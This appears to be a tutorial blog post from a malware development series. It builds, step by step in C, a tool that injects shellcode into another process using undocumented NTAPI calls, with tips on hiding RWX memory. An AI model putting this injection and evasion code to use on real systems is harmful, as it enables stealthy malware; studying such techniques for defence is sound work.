Complete NTAPI Implementation

July 10th, 2023

Foreword

There's a video to go along with this blog post! Check it out here, or better yet, view the entire malware development series so far:

Overview

This is a continuation of the single-function replacement example that used NTDLL. The only difference between that example and this one is that every Win32 API call is now replaced with its lower-level NTAPI counterpart. See the shellcode injection flow charts below (the Win32 chain first, then its NTAPI equivalent):

OpenProcess() or CreateProcess() ---> VirtualAllocEx() ---> WriteProcessMemory() ---> CreateRemoteThreadEx()

NtOpenProcess() or NtCreateProcess() ---> NtAllocateVirtualMemory() ---> NtWriteVirtualMemory() ---> NtCreateThreadEx()

Prerequisites

Before our program can use all of these functions, we need to do some extra setup, since the NTDLL/NTAPI functions take a bit more work to get going. I'll create a new header file called glassBox.h that'll house all my macros and structures. Here are all of the structures we need to add.

glassBox.h

#pragma once
#pragma comment(lib, "ntdll")

#include <Windows.h>
#include <stdio.h>

/*----------[MACROS]----------*/
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define okay(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__)
#define info(msg, ...) printf("[i] " msg "\n", ##__VA_ARGS__)
#define warn(msg, ...) printf("[!] " msg "\n", ##__VA_ARGS__)

/*----------[STRUCTS]---------*/
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG              Length;
    HANDLE             RootDirectory;
    PUNICODE_STRING    ObjectName;
    ULONG              Attributes;
    PVOID              SecurityDescriptor;
    PVOID              SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _CLIENT_ID {
    PVOID              UniqueProcess;
    PVOID              UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

Undocumented Kernel Structures

Where do we get these structures? Where the hell do they even come from, I hear you asking. Well, if we take a look at a function like NtOpenProcess, for example, we can see that it requires the following:

We see our typical parameters, like ProcessHandle and DesiredAccess, but what about these two new parameters: ObjectAttributes (_OBJECT_ATTRIBUTES) and ClientId (_CLIENT_ID)? These are sparsely documented structures that Windows.h doesn't define for us, which is why the above setup was required. We covered this briefly in the last blog post, so this shouldn't be very alien to you. Using a website that documents tons of these structures, like the one down below, we can easily incorporate them into our programs.

So, all we know so far (if we didn't see the setup code in the prerequisites section) is that we need two structures, ObjectAttributes and ClientId. Let's go find them on this site!

If you weren't aware of your Windows build or version, you could run the following command in a command prompt: winver

Right, we know our Windows build/version, so let's proceed. Our build of Windows is newer than the latest build documented on this site, but for our purposes, it should be fine. We'll also delve into how you can manually dump these structures later. Once we're in the right section, we can search for the structure we're interested in. The first structure we need for NtOpenProcess is ObjectAttributes. Its parameter type is "POBJECT_ATTRIBUTES", and since the "P" in front of OBJECT_ATTRIBUTES denotes a pointer to the structure, we can infer that the structure itself is named _OBJECT_ATTRIBUTES. Let's search for that:

We can click on this, and see what it shows:

There we go! We have all this juicy information that's required for our program. Let's copy that structure and define it within our program:

typedef struct _OBJECT_ATTRIBUTES {
    ULONG              Length;
    HANDLE             RootDirectory;
    PUNICODE_STRING    ObjectName;
    ULONG              Attributes;
    PVOID              SecurityDescriptor;
    PVOID              SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

With the _OBJECT_ATTRIBUTES structure defined, let's move on to the next one needed by NtOpenProcess, _CLIENT_ID.

Nice. Let's define this in our program as well:

typedef struct _CLIENT_ID {
    PVOID              UniqueProcess;
    PVOID              UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

Those are the required structures for NtOpenProcess()!

Please also remember that VERGILIUS, as great as it is, isn't the ONLY resource that can help you find structures like this. You can do some more searching to find similar resources, and we'll be discussing how to dump these structures soon. For example, as we talked about in the last blog post, you can use the sites below this hint for your purposes.

We're almost done. All that's left is to discuss that _UNICODE_STRING structure:

typedef struct _UNICODE_STRING{
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

Where does this come from? With the other two structures, their origin makes some sense since a function we're trying to use requires them. However, this structure seems like it came totally out of left field. Well, if you're vigilant, you'll actually notice that the answer was right before our eyes this entire time. Take a look at the _OBJECT_ATTRIBUTES structure once more, and see if you can understand where the above structure is actually required:

Remember, your functions aren't the only things that require structures. Sometimes, your structures may need structures. This is definitely the case with the _OBJECT_ATTRIBUTES structure, since its ObjectName member is a pointer to a _UNICODE_STRING structure.

So, because of this, we need to set up the _UNICODE_STRING structure for our _OBJECT_ATTRIBUTES structure. With all of the groundwork done, let's discuss how we might be able to dump these structures manually.

Dumping Kernel Structures

We've previously consulted VERGILIUS to get the structures our program needs. But it's more beneficial to learn how the process (or at least, a process) of dumping these structures manually works. Let's take the _UNICODE_STRING and _CLIENT_ID structures as examples. Using a debugger like WinDbg, we can dump a structure's definition like this:

dt nt!_UNICODE_STRING

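As we can see, we've dumped the structure, and it's showing us the same thing that a site like VERGILIUS would. Note that the listing below is the 32-bit layout; on x64 the pointer is 8 bytes wide, so Buffer sits at offset 0x8 and the structure is 0x10 bytes: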

//0x8 bytes (sizeof)
struct _UNICODE_STRING
{
    USHORT Length;                                                          //0x0
    USHORT MaximumLength;                                                   //0x2
    WCHAR* Buffer;                                                          //0x4
};

It's the same thing for the _CLIENT_ID structure as well:

And again, we'd get the same results from something like VERGILIUS:

//0x8 bytes (sizeof)
struct _CLIENT_ID
{
    VOID* UniqueProcess;                                                    //0x0
    VOID* UniqueThread;                                                     //0x4
};

Hopefully, that gives you an idea of one way these undocumented kernel structures can be dumped. Now, with all of the structures defined and ready to be used, let's move on to actually making the rest of the program. Oh, one last thing: don't let the name "kernel structures" fool you, they can 100% be used in user mode as well. Matter of fact, that's exactly what we're doing here.
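If you copy a structure by hand, it can be worth checking that your compiler lays it out the way the debugger or VERGILIUS says it should. Here's a minimal sketch of that idea. It assumes stand-in types written with standard C types (DEMO_UNICODE_STRING, DEMO_CLIENT_ID and print_layouts are hypothetical names, not part of glassBox.h), so it builds without Windows.h:

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-ins for the real structures, using standard C types.
   USHORT -> uint16_t, PWSTR / PVOID -> plain pointers.
   These names are hypothetical and only exist for this check. */
typedef struct {
    uint16_t  Length;
    uint16_t  MaximumLength;
    uint16_t *Buffer;
} DEMO_UNICODE_STRING;

typedef struct {
    void *UniqueProcess;
    void *UniqueThread;
} DEMO_CLIENT_ID;

/* Print sizes and member offsets so they can be compared
   against the output of `dt` or a VERGILIUS listing. */
void print_layouts(void) {
    printf("_UNICODE_STRING  size=0x%zx\n", sizeof(DEMO_UNICODE_STRING));
    printf("  Length         +0x%zx\n", offsetof(DEMO_UNICODE_STRING, Length));
    printf("  MaximumLength  +0x%zx\n", offsetof(DEMO_UNICODE_STRING, MaximumLength));
    printf("  Buffer         +0x%zx\n", offsetof(DEMO_UNICODE_STRING, Buffer));

    printf("_CLIENT_ID       size=0x%zx\n", sizeof(DEMO_CLIENT_ID));
    printf("  UniqueProcess  +0x%zx\n", offsetof(DEMO_CLIENT_ID, UniqueProcess));
    printf("  UniqueThread   +0x%zx\n", offsetof(DEMO_CLIENT_ID, UniqueThread));
}
```

Call print_layouts() from a scratch program and compare the numbers. The pointer members follow the pointer size of your build, so a 32-bit build should line up with the listings above, while a 64-bit build puts Buffer and UniqueThread at +0x8.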

Making the Program

Phew, the structures! We're finally on our way to performing shellcode injection purely through NTDLL/NTAPI! Firstly, we must define prototypes for the functions that we're eventually going to use. If you remember the flow path for NTAPI process injection, it follows something along these lines:

NtOpenProcess() or NtCreateProcess()        /* attach to, or create a process */
                |
                |
                |
     NtAllocateVirtualMemory()     /* allocate a buffer to the process memory */
                |
                |
                |
        NtWriteVirtualMemory() /* write your payload to that allocated buffer */
                |
                |
                |  
        NtCreateThreadEx()             /* create a thread to run your payload */

The question now arises, where can we find the prototypes for these functions such that we may be able to incorporate them? There are various ways for us to do this. One of my favourite ways is by consulting the Process Hacker Native API (PHNT) files:

This repository actually houses the NTAPI-specific functions/structures that the System Informer project uses. It's a really useful repository for us since it has NTAPI functions and Kernel structures present within it. Since we're going to get a handle on a process, let's look for NtOpenProcess:

Again, as with the VERGILIUS project, the site above isn't the only way to find information on undocumented NTDLL functions. Don't rely solely on one resource, because as you'll see, sometimes (especially for those of you using NTINTERNALS) there may be a function that's on one resource, but not on another. So, make sure to do your due diligence as well.

Let's take a look at one function, before rinsing and repeating for the rest of them. Let's start with something like NtOpenProcess:

With that syntax above, we can incorporate this into our glassBox.h header file like this:

/*---------[FUNCS]---------*/
typedef NTSTATUS(NTAPI* NtOpenProcess)(
    _Out_ PHANDLE ProcessHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_opt_ PCLIENT_ID ClientId
);

And now, we've successfully created a prototype for our NtOpenProcess function. Now, let's do it for the rest of them (NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx). It all goes smoothly up until we get to NtCreateThreadEx:

So, like we've been doing, let's include this structure (PS_ATTRIBUTE_LIST), along with any other structures that PS_ATTRIBUTE_LIST itself needs, in our glassBox.h file. After doing that, we can see that our header file now looks like this:

With the header file done, we can start building out the main injection program like we've been doing this entire time. We've already covered how to do most of these steps in the last blog post so I'll program out what we should know by now before coming to the individual functions.

#include "glassBox.h"

/*-----------[GETMOD]-----------*/
HMODULE getMod(LPCWSTR modName) {

    HMODULE hModule = NULL;
    info("trying to get a handle to %S", modName);

    hModule = GetModuleHandleW(modName);

    if (hModule == NULL) {
        warn("failed to get a handle to the module. error: 0x%lx\n", GetLastError());
        return NULL;
    }

    else {
        okay("got a handle to the module!");
        info("\\___[ %S\n\t\\_0x%p]\n", modName, hModule);
        return hModule;
    }

}

int main(int argc, char* argv[]) {
    
    /*-----------[SETUP/INIT]-----------*/
    NTSTATUS          status;
    DWORD             PID          = 0;
    PVOID             rBuffer      = NULL;
    HANDLE            hProcess     = NULL;
    HANDLE            hThread      = NULL;
    HMODULE           hNTDLL       = NULL;

    unsigned char     crowPuke[]   = "\x90\x90\x90\x90\xcc";
    size_t            crowPukeSize = sizeof(crowPuke);
    size_t            bytesWritten = 0;

    if (argc < 2) {
        warn("usage: %s <PID>", argv[0]);
        return EXIT_FAILURE;
    }

    PID = atoi(argv[1]);

    OBJECT_ATTRIBUTES OA           = { sizeof(OA), NULL };
    CLIENT_ID         CID          = { (HANDLE)(ULONG_PTR)PID, NULL };

    hNTDLL = getMod(L"NTDLL");
    
    if (hNTDLL == NULL) {
        warn("unable to get a handle to NTDLL, error: 0x%lx", GetLastError());
        goto CLEANUP;
    }

    /* we are here */    
    info("populating function prototypes");
    
    info("cleaning up now");
    goto CLEANUP;

CLEANUP:

    if (hThread) {
        info("closing handle to thread");
        CloseHandle(hThread);
    }
    if (hProcess) {
        info("closing handle to process");
        CloseHandle(hProcess);
    }
 
    okay("finished with the cleanup, exiting now. goodbye :>");
    return EXIT_SUCCESS;

}

By this point, you should be somewhat familiar with what's happening here (if not, go back to the beginning of the process injection series). Back in glassBox.h, we defined STATUS_SUCCESS, which is only going to be used for one portion of our code: error handling, which we'll see soon. Let's take a look at the structures that we're initializing:

/* initialize the _CLIENT_ID & _OBJECT_ATTRIBUTES kernel structures */
    PID = atoi(argv[1]);
    OBJECT_ATTRIBUTES OA           = { sizeof(OA), NULL };
    CLIENT_ID         CID          = { (HANDLE)(ULONG_PTR)PID, NULL };
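If the { sizeof(OA), NULL } initializer looks like it leaves most of the structure untouched, here's a small sketch of what C actually does with it. It assumes a stand-in structure built from standard C types (DEMO_OBJECT_ATTRIBUTES and make_object_attributes are hypothetical names), so it compiles without Windows.h:

```c
#include <stddef.h>
#include <stdint.h>

/* Stand-in for OBJECT_ATTRIBUTES using standard C types.
   ULONG -> uint32_t, HANDLE / PVOID / PUNICODE_STRING -> void *.
   The name is hypothetical and only exists for this demonstration. */
typedef struct {
    uint32_t Length;
    void    *RootDirectory;
    void    *ObjectName;
    uint32_t Attributes;
    void    *SecurityDescriptor;
    void    *SecurityQualityOfService;
} DEMO_OBJECT_ATTRIBUTES;

/* Initialize the structure the same way the post does: only the first
   two members are listed. C zero-initializes every member that has no
   explicit initializer, so the remaining four end up as 0 / NULL. */
DEMO_OBJECT_ATTRIBUTES make_object_attributes(void) {
    DEMO_OBJECT_ATTRIBUTES oa = { (uint32_t)sizeof(oa), NULL };
    return oa;
}
```

So after this initializer, Length holds the structure's own size and everything else is zeroed, which is all that's needed when the structure carries no name, root directory, or security information.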

It's important to note that you can fill in CID in multiple ways. The general idea is that we're trying to put the PID into the UniqueProcess member of the _CLIENT_ID structure, which we've named CID. You could also supply it like this:

/* like this */
CLIENT_ID CID = { (HANDLE)(ULONG_PTR)atoi(argv[1]), NULL };

/* or like this, etc. etc. */
CLIENT_ID CID = { 0 };
CID.UniqueProcess = (HANDLE)(ULONG_PTR)PID;
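One thing all of these variants share is atoi, which quietly returns 0 for input it can't parse. Here's a hedged sketch of a stricter alternative built on strtoul. The helper name parse_pid is hypothetical, and rejecting 0 is an assumption of this sketch rather than something the original code does:

```c
#include <ctype.h>
#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

/* Parse a decimal PID from a command-line argument.
   Returns 1 and stores the value in *pid on success, 0 on any error. */
int parse_pid(const char *text, uint32_t *pid) {
    char *end = NULL;
    unsigned long value;

    /* Require a leading digit: rejects NULL, "", signs and whitespace. */
    if (text == NULL || !isdigit((unsigned char)text[0])) {
        return 0;
    }

    errno = 0;
    value = strtoul(text, &end, 10);

    /* Reject overflow, trailing junk such as "12ab", and out-of-range values. */
    if (errno != 0 || *end != '\0' || value > UINT32_MAX) {
        return 0;
    }

    /* Assumption of this sketch: treat 0 as invalid input. */
    if (value == 0) {
        return 0;
    }

    *pid = (uint32_t)value;
    return 1;
}
```

In main, this would replace the atoi call: if parse_pid(argv[1], &value) returns 0, print the usage message and bail out instead of continuing with a bogus PID.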

I'm showing you all of these ways of filling in CID because I feel like sometimes we get too caught up in what we see from others and forget to experiment. So, yeah, there are a ton of ways to do things, and you shouldn't take someone's code as gospel, including mine. Oh, please. Especially not mine. Anyways, let's continue to the next structure, OA. We're assigning its first member, Length, the size of the _OBJECT_ATTRIBUTES structure itself. The rest of the structure is zero-initialized, since any member we don't list in the initializer is set to 0 (NULL). Now, this should be good to go. We can begin by populating our function prototypes with the actual addresses of the functions from within NTDLL:

    /*-----------[FUNC PROTOTYPES]-----------*/
    NtOpenProcess kawOpenProcess = (NtOpenProcess)GetProcAddress(hNTDLL, "NtOpenProcess");
    okay("got NtOpenProcess!");
    info("\\___[ NtOpenProcess\n\t| kawOpenProcess\n\t|_0x%p]\n", kawOpenProcess);
    NtAllocateVirtualMemory kawAllocateVirtualMemory = (NtAllocateVirtualMemory)GetProcAddress(hNTDLL, "NtAllocateVirtualMemory");
    okay("got NtAllocateVirtualMemory!");
    info("\\___[ NtAllocateVirtualMemory\n\t| kawAllocateVirtualMemory\n\t|_0x%p]\n", kawAllocateVirtualMemory);
    NtWriteVirtualMemory kawWriteVirtualMemory = (NtWriteVirtualMemory)GetProcAddress(hNTDLL, "NtWriteVirtualMemory");
    okay("got NtWriteVirtualMemory!");
    info("\\___[ NtWriteVirtualMemory\n\t| kawWriteVirtualMemory\n\t|_0x%p]\n", kawWriteVirtualMemory);
    NtCreateThreadEx kawCreateThreadEx = (NtCreateThreadEx)GetProcAddress(hNTDLL, "NtCreateThreadEx");
    okay("got NtCreateThreadEx!");
    info("\\___[ NtCreateThreadEx\n\t| kawCreateThreadEx\n\t|_0x%p]\n", kawCreateThreadEx);

    /* GetProcAddress returns NULL when an export can't be found */
    if (!kawOpenProcess || !kawAllocateVirtualMemory || !kawWriteVirtualMemory || !kawCreateThreadEx) {
        warn("failed to resolve one or more NTAPI functions");
        goto CLEANUP;
    }
    okay("all function prototypes filled!");

This might look a bit crazy, but the bulk of this is just "pretty" formatting for the functions we get. As you can see, we're reaching into the NTDLL module with GetProcAddress, grabbing the address of each exported function, and casting it to the matching function-pointer type. After that, we print out the address for debugging purposes. We can get a sneak peek as to what this will look like below:

After we populate all of our function prototypes, we can now finally begin with programming the actual injection portion of our program.

Making the Program (Cont.)

If we remember from the previous blog, NTAPI functions return NTSTATUS codes. So, we need to make sure that we keep this in mind when programming out these functions. Let's start by getting a handle on our target process with NtOpenProcess:

    /*-----------[INJECTION]-----------*/
    info("getting a handle to the process (%lu)", PID);
    status = kawOpenProcess(...);

The first parameter, ProcessHandle, is a pointer to the process handle variable we've declared - so, let's set this to &hProcess:

    status = kawOpenProcess(&hProcess, ...);

The next parameter, DesiredAccess, is the set of access rights we want on the process once we've gotten a handle to it. In this case, we'll use PROCESS_ALL_ACCESS.

    status = kawOpenProcess(&hProcess, PROCESS_ALL_ACCESS, ...);

The third parameter, ObjectAttributes, is a pointer to that OBJECT_ATTRIBUTES structure we set up at the start of our program. We've called it OA, so let's supply this:

    status = kawOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &OA, ...);

The last parameter, ClientId, is an optional input parameter, and it's a pointer to the CLIENT_ID structure we set up at the start of our program. We've called it CID, so let's supply this:

    status = kawOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &OA, &CID);

With this done, we can now check the return value of this function to see if it's STATUS_SUCCESS indicating that our function ran successfully:

    if (status != STATUS_SUCCESS) {
        warn("failed to get a handle to the process, error: 0x%x", status);
        goto CLEANUP;
    }

Next, we have to allocate a region of memory in the process with NtAllocateVirtualMemory. So, as we did with NtOpenProcess, let's go over the parameters one by one.

    status = kawAllocateVirtualMemory(...);

The first parameter, ProcessHandle is our process handle.

    status = kawAllocateVirtualMemory(hProcess, ...);

The next parameter, BaseAddress, is a pointer to the variable that receives the base address of the allocated region. In this case, it'll be &rBuffer.

    status = kawAllocateVirtualMemory(hProcess, &rBuffer, ...);

The next parameter, ZeroBits, isn't important for us, so we'll just set it to 0.

    status = kawAllocateVirtualMemory(hProcess, &rBuffer, 0, ...);

Next up is RegionSize, a pointer to the size of the region we want, which for us is crowPukeSize. Keep in mind that the function also writes the actual size of the allocated region (rounded up to a page boundary) back into this variable. So, let's include this:

    status = kawAllocateVirtualMemory(hProcess, &rBuffer, 0, &crowPukeSize, ...);

Now, we have to set the allocation type of our allocated buffer, AllocationType. We want to reserve and commit the region, so we'll supply MEM_COMMIT | MEM_RESERVE.

    status = kawAllocateVirtualMemory(hProcess, &rBuffer, 0, &crowPukeSize, (MEM_COMMIT | MEM_RESERVE), ...);

Okay, cool. Now, it's time for the permissions of this region, Protect. We'll just set this to RWX, but you can 100% use VirtualProtect's NTAPI equivalent to change the permissions from RW to RX afterwards so it's less suspicious. However, for now, we'll just keep it simple.

    status = kawAllocateVirtualMemory(hProcess, &rBuffer, 0, &crowPukeSize, (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);

    if (status != STATUS_SUCCESS) {
        warn("failed to allocate buffer in process memory, error: 0x%x", status);
        goto CLEANUP;
    }

    okay("allocated a region of %zu-bytes with PAGE_EXECUTE_READWRITE permissions", crowPukeSize);
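A detail that's easy to miss here: RegionSize is an in/out parameter. NtAllocateVirtualMemory rounds the requested size up to a page boundary and writes the result back, so after the call crowPukeSize describes the region, not the payload. The rounding itself can be sketched like this, assuming a 4 KiB page (typical on x86/x64, but an assumption all the same); DEMO_PAGE_SIZE and round_up_to_page are hypothetical names:

```c
#include <stddef.h>

/* Assumed page size for this sketch: 4 KiB. */
#define DEMO_PAGE_SIZE ((size_t)0x1000)

/* Round a byte count up to the next multiple of the page size.
   The mask trick works because DEMO_PAGE_SIZE is a power of two. */
size_t round_up_to_page(size_t size) {
    return (size + DEMO_PAGE_SIZE - 1) & ~(DEMO_PAGE_SIZE - 1);
}
```

With our tiny payload, that means the okay() message above reports a full page rather than a handful of bytes. If you need the payload size later, take it from sizeof(crowPuke) or keep a separate copy before the call.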

You could try to implement a function/macro that handles all of these status-return if-checks. I just got lazy, so I'm going to be copy-pasting this segment for each of the NTAPI functions that we end up using.
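For the curious, here's roughly what such a helper could look like. This is a minimal sketch, not what the final program uses: DEMO_NTSTATUS, DEMO_NT_SUCCESS and check_status are hypothetical names, and the types are standard C stand-ins so it compiles without Windows.h. The success test mirrors the NT_SUCCESS macro from the Windows headers, which treats any non-negative status as success instead of comparing against STATUS_SUCCESS alone:

```c
#include <stdint.h>
#include <stdio.h>

/* Stand-in for NTSTATUS, which is a 32-bit signed LONG on Windows. */
typedef int32_t DEMO_NTSTATUS;

/* Same test as the NT_SUCCESS macro: success and informational
   codes are non-negative, warnings and errors are negative. */
#define DEMO_NT_SUCCESS(status) (((DEMO_NTSTATUS)(status)) >= 0)

/* Returns 1 when the call succeeded. Otherwise prints which step
   failed, along with the status code, and returns 0. */
int check_status(const char *step, DEMO_NTSTATUS status) {
    if (DEMO_NT_SUCCESS(status)) {
        return 1;
    }
    printf("[!] %s failed, status: 0x%08lx\n", step, (unsigned long)(uint32_t)status);
    return 0;
}
```

Each if-block then shrinks to a single line along the lines of: if (!check_status("NtOpenProcess", status)) goto CLEANUP;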

With our buffer allocated, we can now write to that page. So, with NtWriteVirtualMemory, let's go ahead and do that.

    status = kawWriteVirtualMemory(...);

The first parameter, ProcessHandle, is... well, you know by now.

    status = kawWriteVirtualMemory(hProcess, ...);

Next, we have the BaseAddress which is the freshly-created page that we just set up; for this, we'll supply rBuffer.

    status = kawWriteVirtualMemory(hProcess, rBuffer, ...);

Then, we can supply our payload for the Buffer parameter, since it's what we're actually trying to write to the page:

    status = kawWriteVirtualMemory(hProcess, rBuffer, crowPuke, ...);

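Next up, we have BufferSize, which is the size of our payload. We pass sizeof(crowPuke) rather than crowPukeSize here because NtAllocateVirtualMemory has already overwritten crowPukeSize with the page-rounded size of the region: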

    status = kawWriteVirtualMemory(hProcess, rBuffer, crowPuke, sizeof(crowPuke), ...);

Lastly, we have a pointer to the number of bytes written. We don't need this, but I like to include it for the sake of verbosity.

    status = kawWriteVirtualMemory(hProcess, rBuffer, crowPuke, sizeof(crowPuke), &bytesWritten);

    if (status != STATUS_SUCCESS) {
        warn("failed to write to allocated buffer, error: 0x%x", status);
        goto CLEANUP;
    }
    
    okay("wrote %zu-bytes to allocated buffer", bytesWritten);

I won't cover NtCreateThreadEx in this blog post because we already covered it in the last one where we replaced a single Win32 API function with its NTAPI counterpart. You can find that here:

Performing the Injection

With that done, all we have to do is wait for the thread to finish (or you don't have to, I guess; do whatever you want):

    okay("got a handle to the thread!");
    info("\\___[ hThread\n\t\\_0x%p]\n", hThread);

    info("waiting for thread to finish...");
    WaitForSingleObject(hThread, INFINITE);
    okay("thread finished execution!"); 
    
    info("cleaning up now");
    goto CLEANUP;

CLEANUP:

    if (hThread) {
        info("closing handle to thread");
        CloseHandle(hThread);
    }
    if (hProcess) {
        info("closing handle to process");
        CloseHandle(hProcess);
    }

    okay("finished with the cleanup, exiting now. goodbye :>");
    return EXIT_SUCCESS;

}

You can find the completed source code for this down below or in the GitHub repository for this malware development series.

Finally, we can now perform the injection. Running this against a process like mspaint.exe, we can see that this works beautifully. I'm using a calculator POC shellcode from msfvenom:

With that done, we've completely injected a target process using solely the NTAPI counterparts of the Win32 API functions. Well, we still used some functions from Kernel32 like WaitForSingleObject and CloseHandle, but you get what I mean. In the next blog post, we'll take a look at using system calls directly to perform an injection - which is the natural next step up from this technique.

Acknowledgements

Thank you pseudo and Man in the Purple Tux for making me realize that this blog post (before now) was sort of lacklustre and was missing some key information, and for pointing out that I was using the wrong parameters in the prototype for NtOpenProcess. I must've been hammered, sleep-deprived, or both. I appreciate you guys, and I hope this update gives you everything you were looking for. Also, if this code looks nothing like my previous code, it's because I've rewritten it from scratch whilst following my previous code. I've learned a lot since then. Thank you to my incredible friend, 5pider, for introducing me to some cool programming tips for this specific post as well. Till next time, keep on hackin'. See ya!